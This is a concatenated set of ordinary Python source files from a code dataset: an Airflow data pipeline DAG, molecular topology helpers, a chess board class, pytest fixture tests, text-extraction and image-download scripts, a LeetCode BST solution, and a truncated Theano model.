\"SOCRATA_API_KEY_ID\": {\n \"opitem\": \"Socrata Key ID, Secret, and Token\",\n \"opfield\": \"socrata.apiKeyId\",\n },\n \"SOCRATA_API_KEY_SECRET\": {\n \"opitem\": \"Socrata Key ID, Secret, and Token\",\n \"opfield\": \"socrata.apiKeySecret\",\n },\n \"SOCRATA_APP_TOKEN\": {\n \"opitem\": \"Socrata Key ID, Secret, and Token\",\n \"opfield\": \"socrata.appToken\",\n },\n \"AGOL_USERNAME\": {\n \"opitem\": \"ArcGIS Online (AGOL) Scripts Publisher\",\n \"opfield\": \"production.username\",\n },\n \"AGOL_PASSWORD\": {\n \"opitem\": \"ArcGIS Online (AGOL) Scripts Publisher\",\n \"opfield\": \"production.password\",\n },\n}\n\n\nwith DAG(\n dag_id=\"atd_knack_markings_work_orders_jobs\",\n description=\"Load work orders markings jobs (view_3100) records from Knack to Postgrest to AGOL, Socrata\",\n default_args=DEFAULT_ARGS,\n # runs once at 1130a ct and again at 140pm ct\n schedule_interval=\"40 11,13 * * *\" if DEPLOYMENT_ENVIRONMENT == \"production\" else None,\n tags=[\"repo:atd-knack-services\", \"knack\", \"socrata\", \"agol\", \"signs-markings\"],\n catchup=False,\n) as dag:\n docker_image = \"atddocker/atd-knack-services:production\"\n app_name = \"signs-markings\"\n container = \"view_3100\"\n\n date_filter_arg = get_date_filter_arg(should_replace_monthly=True)\n\n env_vars = get_env_vars_task(REQUIRED_SECRETS)\n\n t1 = DockerOperator(\n task_id=\"atd_knack_markings_work_orders_jobs_to_postgrest\",\n image=docker_image,\n auto_remove=True,\n command=f\"./atd-knack-services/services/records_to_postgrest.py -a {app_name} -c {container} {date_filter_arg}\",\n environment=env_vars,\n tty=True,\n force_pull=True,\n mount_tmp_dir=False,\n )\n\n\n t2 = DockerOperator(\n task_id=\"atd_knack_markings_work_orders_jobs_to_agol\",\n image=docker_image,\n auto_remove=True,\n command=f\"./atd-knack-services/services/records_to_agol.py -a {app_name} -c {container} {date_filter_arg}\",\n environment=env_vars,\n tty=True,\n force_pull=True,\n mount_tmp_dir=False,\n )\n\n t3 = DockerOperator(\n task_id=\"atd_knack_markings_jobs_agol_build_markings_segment_geometries\",\n image=docker_image,\n auto_remove=True,\n command=f'./atd-knack-services/services/agol_build_markings_segment_geometries.py -l markings_jobs {date_filter_arg}',\n environment=env_vars,\n tty=True,\n mount_tmp_dir=False,\n )\n\n t4 = DockerOperator(\n task_id=\"atd_knack_markings_work_orders_jobs_to_socrata\",\n image=docker_image,\n auto_remove=True,\n command=f'./atd-knack-services/services/records_to_socrata.py -a {app_name} -c {container} {date_filter_arg}',\n environment=env_vars,\n tty=True,\n mount_tmp_dir=False,\n )\n\n date_filter_arg >> t1 >> t2 >> t3 >> t4\n","sub_path":"dags/atd_knack_markings_work_orders_jobs.py","file_name":"atd_knack_markings_work_orders_jobs.py","file_ext":"py","file_size_in_byte":4034,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"340266039","text":"#!/usr/bin/env python\n\nimport numpy as np\nimport sys\n\nsys.dont_write_bytecode = True\n\n\nmoltype_dict = {1: \"wat\", 2: \"wat\", 3: \"poly\"}\nblength = {\"poly\": 1.53, \"wat\": 1.}\nbtype_dict = {\"wat\": 1, \"poly\": 2}\nbondtoangle_type_dict = {1:1, 2:2}\ntol = 1e-2\n\ndef isBonded(atom1,atom2):\n\n\thasBond = 0\n\tbtype = 0\n\n\tatomtype_1 = int(atom1.split()[2])\n\tatomtype_2 = int(atom2.split()[2])\n\tmoltype = moltype_dict[atomtype_1]\n\tblen = blength[moltype]\n\tpos1 = [float(atom1.split()[-3]), float(atom1.split()[-2]), float(atom1.split()[-1])]\n\tpos2 = [float(atom2.split()[-3]), float(atom2.split()[-2]), float(atom2.split()[-1])]\n\tpos1 = np.array(pos1)\n\tpos2 = np.array(pos2)\n\tthis_blen = np.linalg.norm(pos1-pos2)\n\tif abs(this_blen - blen) <= tol:\n\t\tbtype = btype_dict[moltype]\n\t\thasBond = 1\n\n\treturn (hasBond, btype)\n\n\n\n\n\n\ndef isAngle(bond1,bond2):\n\n\thasAngle = 0\n\tatype = 0\n\tangle = (0,0,0)\n\tcenter = 0\n\n\tatoms = {}\n\tbtype1 = int(bond1.split()[1])\n\tbtype2 = int(bond2.split()[1])\n\tatoms[int(bond1.split()[-1])] = btype1\n\tatoms[int(bond1.split()[-2])] = btype1\n\tatoms[int(bond2.split()[-1])] = btype2\n\tatoms[int(bond2.split()[-2])] = btype2\n\n\tidlist = [int(bond1.split()[-2]),int(bond1.split()[-1]),int(bond2.split()[-2]),int(bond2.split()[-1])]\n\n\tfor i, atom in enumerate(idlist):\n\t\tif idlist.count(atom)>1:\n\t\t\t\tcenter = atom\n\t\t\t\tidlist.pop(i)\n\n\tif center:\n\t\thasAngle = 1\n\t\tfor j, atom in enumerate(idlist):\n\t\t\tif atom==center: idlist.pop(j)\n\n\t\tangle = (idlist[0],center,idlist[1])\n\t\tatype = atoms[center]\n\n\treturn(hasAngle,atype,angle)\n\n\n\n\n\n\n","sub_path":"makeLammps/topology.py","file_name":"topology.py","file_ext":"py","file_size_in_byte":1528,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"497433203","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('about', '0003_auto_20160520_2116'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='email',\n name='success',\n field=models.NullBooleanField(help_text=b'Whether send email successfully.', verbose_name=b'success'),\n ),\n ]\n","sub_path":"apps/about/migrations/0004_auto_20160520_2117.py","file_name":"0004_auto_20160520_2117.py","file_ext":"py","file_size_in_byte":464,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"330513150","text":"\"\"\"\n\nBoard class, representing the board with pieces\nauthor: @fuego\n\n\"\"\"\n\nfrom piece import *\nfrom rule import Rule\nfrom copy import deepcopy\nimport logging\n\n\nclass Board():\n def __init__(self, state=\"PLAYING\"):\n self.pieces = [[None for _ in range(8)] for _ in range(8)]\n self.loses = []\n self.state = state\n self.token = \"test\"\n self.rules = []\n self.turn = \"w\"\n logging.info('Board created')\n\n def init_game(self):\n whites = [Piece(\"w\", \"P\", [1, 0]),\n Piece(\"w\", \"P\", [1, 1]),\n Piece(\"w\", \"P\", [1, 2]),\n Piece(\"w\", \"P\", [1, 3]),\n Piece(\"w\", \"P\", [1, 4]),\n Piece(\"w\", \"P\", [1, 5]),\n Piece(\"w\", \"P\", [1, 6]),\n Piece(\"w\", \"P\", [1, 7]),\n Piece(\"w\", \"K\", [0, 4]),\n Piece(\"w\", \"Q\", [0, 3]),\n Piece(\"w\", \"N\", [0, 1]),\n Piece(\"w\", \"N\", [0, 6]),\n Piece(\"w\", \"R\", [0, 0]),\n Piece(\"w\", \"R\", [0, 7]),\n Piece(\"w\", \"B\", [0, 2]),\n Piece(\"w\", \"B\", [0, 5])]\n\n for piece in whites:\n self.place_piece(piece)\n for rule in piece.get_rules():\n self.rules.append(Rule(rule, self, piece))\n\n blacks = deepcopy(whites)\n for piece in blacks:\n piece.set_side(\"b\")\n piece.set_position([7 - piece.get_position()[0], piece.get_position()[1]], False)\n self.place_piece(piece)\n for rule in piece.get_rules():\n self.rules.append(Rule(rule, self, piece))\n\n logging.info('Game created')\n\n def place_piece(self, piece):\n self.pieces[piece.get_position()[0]][piece.get_position()[1]] = piece\n logging.debug('Piece placed to {}'.format(piece.get_position()))\n\n def remove_piece(self, piece):\n self.pieces[piece.get_position()[0]][piece.get_position()[1]] = None\n logging.debug('Piece removed from {}'.format(piece.get_position()))\n\n def move_piece(self, old_coordinates, move):\n piece = self.pieces[old_coordinates[0]][old_coordinates[1]]\n if piece is None:\n return False\n\n if 0 <= move[0] < 8 and 0 <= move[1] < 8:\n destination = self.pieces[move[0]][move[1]]\n if destination is not None:\n if destination.get_side() == piece.get_side():\n logging.debug('Destination and source is on the same side')\n return False\n else:\n logging.debug('Attack attempt')\n if self.is_allowed_attack(piece, move):\n for rule in self.rules:\n if not rule.get_replace():\n if not rule.is_respected(piece, move):\n return False\n self.pieces[old_coordinates[0]][old_coordinates[1]] = None\n self.loses.append(self.pieces[move[0]][move[1]])\n self.pieces[move[0]][move[1]] = piece\n piece.set_position([move[0], move[1]])\n logging.info('Attack successful')\n return True\n else:\n logging.debug('Attack failed')\n return False\n else:\n logging.debug('Movement attempt')\n if self.is_allowed(piece, move):\n for rule in self.rules:\n if not rule.get_replace():\n if not rule.is_respected(piece, move):\n return False\n self.pieces[old_coordinates[0]][old_coordinates[1]] = None\n self.pieces[move[0]][move[1]] = piece\n piece.set_position([move[0], move[1]])\n logging.debug('Movement successful')\n return True\n else:\n logging.debug('Movement failed')\n return False\n else:\n return False\n\n def check_move(self, piece, move, ref_array):\n position = [piece.get_position()[0], piece.get_position()[1]]\n gradient = [move[0] - position[0], move[1] - position[1]]\n\n if not piece.get_across():\n if gradient[0] >= 0:\n i_tab = range(1, gradient[0])\n else:\n i_tab = range(gradient[0] + 1, 0)\n if gradient[1] >= 0:\n j_tab = range(1, gradient[1])\n else:\n j_tab = range(gradient[1] + 1, 0)\n if gradient[1] == 0:\n for i in i_tab:\n if 0 <= i + position[0] < 8:\n if self.pieces[i + position[0]][position[1]] is not None:\n logging.debug('Obstacle in {}'.format(i + position[0], position[1]))\n return False\n if gradient[0] == 0:\n for j in j_tab:\n if 0 <= j + position[1] < 8:\n if self.pieces[position[0]][j + position[1]] is not None:\n logging.debug('Obstacle in {}'.format(position[0], j + position[1]))\n return False\n for i in i_tab:\n for j in j_tab:\n if 0 <= i + position[0] < 8 and 0 <= j + position[1] < 8:\n if self.pieces[i + position[0]][j + position[1]] is not None and abs(i) == abs(j):\n logging.debug('Obstacle in {}'.format(i + position[0], j + position[1]))\n return False\n\n for rule in self.rules:\n if rule.get_replace():\n if rule.is_respected(piece, move):\n logging.debug('Special rule applied')\n return True\n\n for possibilities in ref_array[0]:\n if gradient == possibilities:\n logging.debug('Possibility finded')\n return True\n if ref_array[1]:\n if possibilities[0] >= 0:\n alpha_tab = range(1, possibilities[0])\n else:\n alpha_tab = range(possibilities[0]+1, 1)\n if possibilities[1] >= 0:\n beta_tab = range(1, possibilities[1])\n else:\n beta_tab = range(possibilities[1]+1, 1)\n if ref_array[3]:\n for alpha in alpha_tab:\n if gradient == [alpha, 0]:\n return True\n for beta in beta_tab:\n if gradient == [0, beta]:\n return True\n if ref_array[2]:\n for alpha in alpha_tab:\n for beta in beta_tab:\n if gradient == [alpha, beta] and abs(alpha) == abs(beta):\n return True\n\n return False\n\n def is_allowed(self, piece, move):\n return self.check_move(piece, move, piece.get_movement())\n\n def is_allowed_attack(self, piece, move):\n if piece.get_attack():\n return self.check_move(piece, move, piece.get_attack())\n else:\n return self.is_allowed(piece, move)\n\n def get_pieces(self):\n pieces = []\n for row in self.pieces:\n for piece in row:\n if piece is not None:\n pieces.append(piece)\n return pieces\n\n def get_piece(self, coord):\n return self.pieces[coord[0]][coord[1]]\n\n def check(self):\n return True\n\n def reverse(self):\n reverse = self.pieces[::-1]\n self.pieces = zip(*reverse)\n reverse = self.pieces[::-1]\n self.pieces = zip(*reverse)\n\n def print_pretty(self):\n line_str = \"---------------------------------\"\n print(line_str)\n for row in self.pieces:\n row_str = \"|\"\n for column in row:\n if column is None:\n row_str += \" |\"\n else:\n row_str += \" {0} |\".format(column.get_initial())\n print(row_str)\n print(line_str)\n","sub_path":"board/board.py","file_name":"board.py","file_ext":"py","file_size_in_byte":8315,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"566588914","text":"import xml.etree.ElementTree as ET\r\nfrom set_path_to_InScript import path_to_InScript\r\nimport os\r\n\r\nimport string\r\n\r\nscenario = input(\"Please choose one scneario from: cake, library, flight, haircut, grocery, train, tree, bicycle, bus, bath\")\r\n\r\n\r\n\r\nwith open(\"InScriptESDs.txt\",\"w\") as file:\r\n pfade = [path_to_InScript+scenario+\"/\"+datei for datei in os.listdir(path_to_InScript+scenario)]\r\n for pfad in pfade:\r\n print(pfad)\r\n zeile = \"\"\r\n testzeile = \"\"\r\n try:\r\n tree = ET.parse(pfad)\r\n except FileNotFoundError:\r\n continue\r\n events = dict()\r\n partizipanten = dict()\r\n corefs = dict()\r\n ids = dict()\r\n for event in tree.find(\"annotations\").find(\"events\").findall(\"label\"):\r\n eventlabel = event.get(\"name\")\r\n if not eventlabel in [\"Evoking\",\"RelNScrEv\",\"Unclear\",\"UnrelEv\"]:\r\n satznummer = event.get(\"from\").split(\"-\")[0]\r\n index = (event.get(\"from\"),event.get(\"to\"))\r\n if not index[1]:\r\n wortnummern = [index[0].split(\"-\")[1]]\r\n else:\r\n wortnummern = [str(n) for n in range(int(index[0].split(\"-\")[1]),int(index[1].split(\"-\")[1])+1)]\r\n if not satznummer in events:\r\n events[satznummer]=dict()\r\n events[satznummer][index]=dict()\r\n events[satznummer][index][\"label\"]=eventlabel[6:]\r\n events[satznummer][index][\"text\"]=event.get(\"text\")\r\n events[satznummer][index][\"wortindices\"]=wortnummern\r\n for partizipant in tree.find(\"annotations\").find(\"participants\").findall(\"label\"):\r\n satznummer = partizipant.get(\"from\").split(\"-\")[0]\r\n index = (partizipant.get(\"from\"),partizipant.get(\"to\"))\r\n if not index[1]:\r\n wortnummern = [index[0].split(\"-\")[1]]\r\n else:\r\n wortnummern = [str(n) for n in range(int(index[0].split(\"-\")[1]),int(index[1].split(\"-\")[1])+1)]\r\n original_text = partizipant.get(\"text\")\r\n id_ = partizipant.get(\"id\")\r\n if not satznummer in partizipanten:\r\n partizipanten[satznummer] = dict()\r\n partizipanten[satznummer][index]=dict()\r\n partizipanten[satznummer][index][\"label\"]=partizipant.get(\"name\")\r\n partizipanten[satznummer][index][\"text\"]= original_text\r\n partizipanten[satznummer][index][\"wortindices\"]=wortnummern\r\n ids[id_]= original_text\r\n partizipanten[satznummer][index][\"id\"]= id_\r\n del_liste = []\r\n for s in partizipanten:\r\n lang = []\r\n for p in partizipanten[s]:\r\n if len(partizipanten[s][p][\"wortindices\"])>1:\r\n lang.append(partizipanten[s][p])\r\n for p in partizipanten[s]:\r\n if len(partizipanten[s][p][\"wortindices\"])==1:\r\n index = partizipanten[s][p][\"wortindices\"][0]\r\n for l in lang:\r\n if index in l[\"wortindices\"]:\r\n del_liste.append((s,p))\r\n break\r\n for d in del_liste:\r\n del partizipanten[d[0]][d[1]]\r\n del_liste = []\r\n for s in events:\r\n lang = []\r\n for e in events[s]:\r\n if len(events[s][e][\"wortindices\"])>1:\r\n lang.append(events[s][e])\r\n for e in events[s]:\r\n if len(events[s][e][\"wortindices\"])==1:\r\n index = events[s][e][\"wortindices\"][0]\r\n for l in lang:\r\n if index in l[\"wortindices\"]:\r\n del_liste.append((s,e))\r\n break\r\n for d in del_liste:\r\n del events[d[0]][d[1]]\r\n pronouns = \"yourselves Yourselves Themselves themselves myself Myself yourself Yourself himself Himself Herself herself itself Itself ourselves Ourselves I you he she it we they me him her us them my your his her its our their mine yours hers ours theirs this that these those You He She It We They Me Him Her Us Them My Your His Her Its Our Their Mine Yours Hers Ours Theirs This That These Those\".split()\r\n for kette in tree.find(\"annotations\").find(\"chains\").findall(\"chain\"):\r\n c_ids = kette.get(\"elements\").split()\r\n x = \"\"\r\n for i in c_ids:\r\n if not ids[i] in pronouns:\r\n x = ids[i]\r\n break\r\n if x:\r\n for i in c_ids:\r\n corefs[i]=x\r\n for satz in tree.find(\"text\").find(\"sentences\").findall(\"sentence\"):\r\n t = satz.get(\"id\")\r\n dep = dict()\r\n lemmata = dict()\r\n wörter = dict()\r\n for token in satz.findall(\"token\"):\r\n token_id = token.get(\"id\")\r\n wörter[token_id]=token.get(\"content\")\r\n try:\r\n lemmata[token_id]=token.find(\"lemma\").get(\"type\")\r\n except AttributeError:\r\n pass\r\n try:\r\n d = token.find(\"dep\")\r\n head = d.get(\"head\")\r\n relation = d.get(\"type\")\r\n if not head in dep:\r\n dep[head]=dict()\r\n dep[head][token_id]=relation\r\n except AttributeError:\r\n pass\r\n if t in events:\r\n for event in events[t]:\r\n evaluierungsid = event[0].split(\"-\")[1]\r\n eventlabel = events[t][event][\"label\"]\r\n eventteile = dict()\r\n try:\r\n eventteile[int(event[0].split(\"-\")[1])]=(lemmata[event[0]],\"V\")\r\n except KeyError:\r\n eventteile[int(event[0].split(\"-\")[1])]=(wörter[event[0]],\"V\")\r\n if event[1]:\r\n eventteile[int(event[1].split(\"-\")[1])]= (wörter[event[1]],len(wörter[event[1]].split()))\r\n \r\n import math\r\n weitweg = -math.inf\r\n for p in partizipanten[t]:\r\n for index in p:\r\n try:\r\n if ((index in dep[event[0]]) or (index in dep[event[1]])):\r\n if int(index.split(\"-\")[1]) > weitweg:\r\n try:\r\n if int(index.split(\"-\")[1])> int(event[0].split(\"-\")[1]):\r\n weitweg = int(index.split(\"-\")[1])\r\n except KeyError:\r\n pass\r\n except KeyError:\r\n pass\r\n try:\r\n i = int(event[1].split(\"-\")[1])+1\r\n except AttributeError:\r\n i = int(event[0].split(\"-\")[1])+1 \r\n while i < weitweg+1:\r\n index = t+\"-\"+str(i)\r\n partizipant = None\r\n for p in partizipanten[t]:\r\n if index in p:\r\n partizipant = p\r\n if partizipant:\r\n for p in partizipant:\r\n if p:\r\n i += 1\r\n if partizipanten[t][partizipant][\"text\"] in pronouns:\r\n if partizipanten[t][partizipant][\"label\"] in corefs:# If If pronouns are to be replaced, write id instead of label\r\n eventteile[int(p.split(\"-\")[1])] = (corefs[partizipanten[t][partizipant][\"labl\"]],len(corefs[partizipanten[t][partizipant][\"label\"]].split()))# If If pronouns are to be replaced, write id instead of label\r\n\r\n else:\r\n eventteile[int(p.split(\"-\")[1])] = (partizipanten[t][partizipant][\"text\"],len(partizipanten[t][partizipant][\"text\"].split()))\r\n \r\n else:\r\n eventteile[i] = (wörter[index],len(wörter[index].split()))\r\n i+=1\r\n \r\n \r\n \r\n \r\n eventtext = \"\"\r\n eventtest = \"\"\r\n sort = sorted(eventteile)\r\n for s in sort:\r\n test = eventtext.split()\r\n test2 = eventteile[s][0].split()\r\n if not test2 == test[-len(test2):]:\r\n eventtext += eventteile[s][0]+\" \"\r\n if eventteile[s][1]==\"V\":\r\n eventtest+=\"V\"\r\n else:\r\n for strich in range(0,eventteile[s][1]):\r\n eventtest+=\"-\"\r\n\r\n \r\n for w in eventtext.split():\r\n wortneu = \"\"\r\n for char in w.lower():\r\n if not char in string.punctuation:\r\n wortneu += char\r\n if wortneu:\r\n if not wortneu in [\"i\",\"we\",\"they\",\"then\"]:\r\n zeile += w+\" \"\r\n zeile=zeile.strip()\r\n zeile+=\"###\"+eventlabel+\"*\"\r\n file.write(zeile[:-1]+\"\\n\")\r\n \r\n \r\n \r\n\r\n","sub_path":"extract_only_relevant_EDs.py","file_name":"extract_only_relevant_EDs.py","file_ext":"py","file_size_in_byte":9959,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"277861231","text":"from collections import defaultdict\n\nfrom pytest_cases import fixture, fixture_union, parametrize\n\nused = defaultdict(lambda: False)\ntorn_down = defaultdict(lambda: False)\n\n\n@fixture(scope='session')\ndef s1():\n name = 's1'\n global used, torn_down\n assert not used[name]\n used[name] = True\n yield name\n torn_down[name] += 1\n\n\n@fixture(scope='session')\ndef s2():\n name = 's2'\n global used, torn_down\n assert not used[name]\n used[name] = True\n yield name\n torn_down[name] += 1\n\n\n@fixture(scope='session')\ndef s3():\n name = 's3'\n global used, torn_down\n assert not used[name]\n used[name] = True\n yield name\n torn_down[name] += 1\n\n\n@fixture(scope='module')\ndef M1s1s2(s1, s2):\n name = 'M1s1s2'\n global used, torn_down\n assert not used[name]\n used[name] = True\n yield name\n torn_down[name] += 1\n\n\n@fixture(scope='module')\ndef M2s1s3(s1, s3):\n name = 'M2s1s3'\n global used, torn_down\n assert not used[name]\n used[name] = True\n yield name\n torn_down[name] += 1\n\n\n@fixture(scope='function')\ndef F1M1s1s2(M1s1s2):\n name = 'F1M1s1s2'\n global used, torn_down\n assert not used[name]\n used[name] = True\n yield name\n torn_down[name] += 1\n\n\n@fixture(scope='function')\n@parametrize(i=[0, 1])\ndef F2(i):\n name = 'F2(%s)' % i\n global used, torn_down\n assert not used[name]\n used[name] = True\n yield name\n torn_down[name] += 1\n\n\n@fixture(scope='function')\ndef F3s2s3(s2, s3):\n name = 'F3s2s3'\n global used, torn_down\n assert not used[name]\n used[name] = True\n yield name\n torn_down[name] += 1\n\n\n@fixture(scope='function')\ndef F4M2s1s3(M2s1s3):\n name = 'F4M2s1s3'\n global used, torn_down\n assert not used[name]\n used[name] = True\n yield name\n torn_down[name] += 1\n\n\nd = fixture_union('d', (F1M1s1s2, F2, F3s2s3, F4M2s1s3))\n\n\nsuper_closure = None\n\n\ndef test_foo(d, request):\n # store closure for later analysis or test\n global super_closure\n super_closure = request._pyfuncitem._fixtureinfo.names_closure\n\n\ndef test_synthesis(module_results_dct):\n assert all(torn_down.values())\n assert list(module_results_dct) == [\n 'test_foo[d_is_F1M1s1s2]',\n 'test_foo[d_is_F2-i=0]',\n 'test_foo[d_is_F2-i=1]',\n 'test_foo[d_is_F3s2s3]',\n 'test_foo[d_is_F4M2s1s3]'\n ]\n\n function_scoped = ('F1M1s1s2', 'F2(0)', 'F2(1)', 'F3s2s3', 'F4M2s1s3')\n module_scoped = ('M1s1s2', 'M2s1s3')\n session_scoped = ('s1', 's2', 's3')\n\n for item in function_scoped + module_scoped + session_scoped:\n assert used[item] == 1, \"item %s was not used once\" % item\n\n if item in function_scoped:\n assert torn_down[item] == 1, \"item %s was not torn down once\" % item\n # else we know that the last module/session fixture alive is not properly torn down, this is a pytest issue\n\n\n# def test_super_closure():\n# global super_closure\n# print(super_closure)\n","sub_path":"pytest_cases/tests/pytest_extension/fixtures/fixture_unions/test_fixture_union_setup_teardown2.py","file_name":"test_fixture_union_setup_teardown2.py","file_ext":"py","file_size_in_byte":2955,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"80602474","text":"import urllib.request\nimport os\n\n#If a link does not have .jpg at the end, add it\ndef ifNoExtensionAdd(url):\n if url[-4:] != '.jpg' and url[-4:] != '.png':\n new_url = url + '.jpg' \n return new_url\n else:\n return url\n\ndef handleLink(url):\n #Check if imgur or reddit\n #To-Do: Add more sites for better compatiblity\n try:\n #Checks for the various states the imgur url can come in\n if url.find('i.imgur') != -1:\n fixed_url = ifNoExtensionAdd(url)\n image = fixed_url[20:] #for imgur image, strip everything but id and .jpg\n return [True, fixed_url, image] #boolean for whether or not it failed\n \n elif url.find('imgur') != -1:\n jpg_url = ifNoExtensionAdd(url) \n fixed_url = jpg_url[:8] + 'i.' + jpg_url[8:] #Add i to imgur link if it's not there. \n image = fixed_url[20:] #for imgur image, strip everything but id and .jpg\n return [True, fixed_url, image] #boolean for whether or not it failed\n\n elif url.find('redd.it') != -1:\n fixed_url = ifNoExtensionAdd(url) \n image = fixed_url[18:] #for imgur image, strip everything but id and .jpg\n return [True, fixed_url, image] #boolean for whether or not it failed \n else:\n #If not from a supported url, return False\n return [False, url, 'Not supported:']\n \n except:\n return[False, 'Unidentified error during handleLink', url]\n\n#Moves the downloaded image to whever you would like to store it.\ndef moveImage(image_name, image_directory):\n file_location = image_directory + image_name\n \n try:\n os.rename(image_name, file_location)\n \n return [True, file_location, 'Moved image to ' + file_location]\n except:\n return [False, file_location, 'Failed to move file']\n\n#Finds the image from the url and downloads it.\ndef getImage(url, image_location, image_directory):\n try:\n urllib.request.urlretrieve(url, image_location)\n image_moved = moveImage(image_location, image_directory)\n\n if(image_moved[0]):\n return [True, image_moved[1], 'Obtained and moved image to image folder'] \n else:\n return [False, url, image_moved[2] + ' | ' + image_moved[1]]\n except:\n return [False, url, 'Failed to get image']\n \n#Formats the tweet to prepare to send.\ndef prepareTweet(title, url, source):\n #Include source if possible.\n try:\n tweet_text = title + '\\nThis was posted at ' + url + '.\\n' + 'Found on Reddit.com/r/' + source\n return [True, tweet_text]\n except:\n return [False, 'Error creating tweet (link_image_handling > prepareTweet)']\n \n \n \n","sub_path":"link_image_handling.py","file_name":"link_image_handling.py","file_ext":"py","file_size_in_byte":2779,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"276830824","text":"from django.contrib import admin\nfrom gallery.models import Album, Picture\n\nclass PictureInline(admin.TabularInline):\n\tmodel = Picture\n\textra = 1\n\nclass AlbumAdmin(admin.ModelAdmin):\n\tfieldsets = [\n\t\t(None,\t\t\t\t{'fields': ['album_name']}),\n\t]\n\tinlines = [PictureInline]\n\n\tlist_display = ('album_name', 'was_published_recently')\n#Album.objects.get().picture_set.count(),\nadmin.site.register(Album, AlbumAdmin)\n","sub_path":"gallery/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":408,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"269755861","text":"import discord\nfrom discord.ext import commands\n\n\ntoken = os.getenv('token')\nprefix_char = '#'\nbot = commands.Bot(command_prefix = prefix_char)\n\n\n@bot.event\nasync def on_ready():\n print('Logged as: {} - {}'.format(bot.user.name, bot.user.id))\n\n\nbot.run(token)\n","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":263,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"49771826","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Nov 04 10:57:24 2015\r\n\r\n@author: Yiji\r\n\"\"\"\r\n\r\nimport pandas as pd\r\nimport numpy as np\r\n\r\ndef main():\r\n in_filename = 'train.csv'\r\n out_filename = 'sample.csv'\r\n nlinesfile = 145232\r\n nlinesrandomsample = 10000\r\n# nlinesfile = 6\r\n# nlinesrandomsample = 3\r\n lines2skip = np.random.choice(np.arange(1,nlinesfile+1), (nlinesfile-nlinesrandomsample), replace=False)\r\n df = pd.read_csv(in_filename, skiprows=lines2skip,low_memory=False)\r\n df.to_csv(out_filename, sep=',',index=False)\r\n \r\n\r\nmain()","sub_path":"springleaf_project/utils/samplecsv.py","file_name":"samplecsv.py","file_ext":"py","file_size_in_byte":565,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"483228891","text":"\"\"\"\n1382. Balance a Binary Search Tree\nMedium\n\nGiven a binary search tree, return a balanced binary search tree with the same node values.\n\nA binary search tree is balanced if and only if the depth of the two subtrees of every node never differ by more than 1.\n\nIf there is more than one answer, return any of them.\n\nExample 1:\n\nInput: root = [1,null,2,null,3,null,4,null,null]\nOutput: [2,1,3,null,null,null,4]\nExplanation: This is not the only correct answer, [3,1,4,null,2,null,null] is also correct.\n\nConstraints:\n\nThe number of nodes in the tree is between 1 and 10^4.\nThe tree nodes will have distinct values between 1 and 10^5.\n\"\"\"\n\nfrom typing import List\n\nimport sys\nsys.path.insert(1, '../../leetcode/tree/')\n\nfrom binary_tree import TreeNode, print_tree, array_to_bt_lc\n\n# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\n###############################################################################\n\"\"\"\nSolution: use inorder traversal to build sorted array of tree nodes from\nBST. Then use recursion to build balanced BST from sorted array.\n\nO(n) time\nO(n) extra space: for sorted array\n\"\"\"\nclass Solution:\n def balanceBST(self, root: TreeNode) -> TreeNode:\n def inorder(root): # build sorted array\n if not root:\n return\n \n inorder(root.left)\n arr.append(root)\n inorder(root.right)\n \n def build(start, end): # build balanced BST using sorted array\n if start > end:\n return\n \n mid = start + (end - start) // 2\n node = arr[mid]\n \n node.left = build(start, mid-1)\n node.right = build(mid+1, end)\n \n return node\n \n arr = []\n inorder(root) # build sorted array\n \n return build(0, len(arr)-1) # build balanced BST using sorted array\n \n###############################################################################\n\nif __name__ == \"__main__\":\n def test(arr, comment=None):\n print(\"=\"*80)\n if comment:\n print(comment)\n\n root = array_to_bt_lc(arr)\n \n print()\n print_tree(root)\n\n root = sol.balanceBST(root)\n\n print()\n print_tree(root)\n\n\n sol = Solution()\n\n comment = \"LC example\"\n arr = [1,None,2,None,3,None,4,None,None]\n test(arr, comment)\n ","sub_path":"bst/1382_balance_BST.py","file_name":"1382_balance_BST.py","file_ext":"py","file_size_in_byte":2529,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"289353133","text":"# -*- coding: utf-8 -*-\n\nimport theano\nimport theano.tensor as T\nimport numpy as np\nimport cPickle\nimport logging\nimport collections\nlogger = logging.getLogger(__name__)\n\nfrom theano import scan\nfrom theano.sandbox.rng_mrg import MRG_RandomStreams\nfrom theano.tensor.nnet.conv3d2d import *\nfrom collections import OrderedDict\n\nfrom model import *\nfrom utils import *\n\nimport operator\n\n# Theano speed-up\ntheano.config.scan.allow_gc = False\n#\n\ndef add_to_params(params, new_param):\n params.append(new_param)\n return new_param\n \nclass WhenstHourModel(Model):\n def __init__(self, state, test_mode=False):\n Model.__init__(self)\n self.rng = numpy.random.RandomState(state['seed'])\n self.state = state\n self.__dict__.update(state)\n self.test_mode = test_mode\n self.name = 'WhenstHourModel'\n self.active = eval(self.active)\n self.params = []\n self.init_params()\n\n self.x_data = T.imatrix('x_data')\n self.y_data = T.ivector('y_data')\n\n self.xmask = T.matrix('x_mask')\n\n self.h_enc_basic = self.encode(self.x_data, self.xmask)\n self.h_enc_emb = 